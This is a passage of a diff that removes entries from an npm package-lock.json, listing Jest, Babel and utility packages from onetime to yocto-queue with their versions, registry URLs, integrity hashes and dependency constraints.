"sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/secure-json-parse": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", - "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/fastify" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fastify" - } - ], - "license": "BSD-3-Clause" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/table-layout": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", - "integrity": "sha512-iK5/YhZxq5GO5z8wb0bY1317uDF3Zjpha0QFFLA8/trAoiLbQD0HUbMesEaxyzUgDxi2QlcbM8IvqOlEjgoXBA==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "wordwrapjs": "^5.1.0" - }, - "engines": { - "node": ">=12.17" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tslib": { - "version": "2.8.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", - "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", - "license": "0BSD" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typical": { - "version": "7.3.0", - "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", - "integrity": "sha512-ya4mg/30vm+DOWfBg4YK3j2WD6TWtRkCbasOJr40CseYENzCUby/7rIvXA99JGsQHeNxLbnXdyLLxKSv3tauFw==", - "license": "MIT", - "engines": { - "node": ">=12.17" - } - }, - "node_modules/undici": { - "version": "6.21.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-6.21.3.tgz", - "integrity": "sha512-gBLkYIlEnSp8pFbT64yFgGE6UIB9tAkhukC23PmMDCe5Nd+cRqKxSjw5y54MK2AZMgZfJWMaNE4nYUHgi1XEOw==", - "license": "MIT", - "engines": { - "node": ">=18.17" - } - }, - "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "license": "MIT" - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wordwrapjs": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", - "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==", - "license": "MIT", - "engines": { - "node": ">=12.17" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": 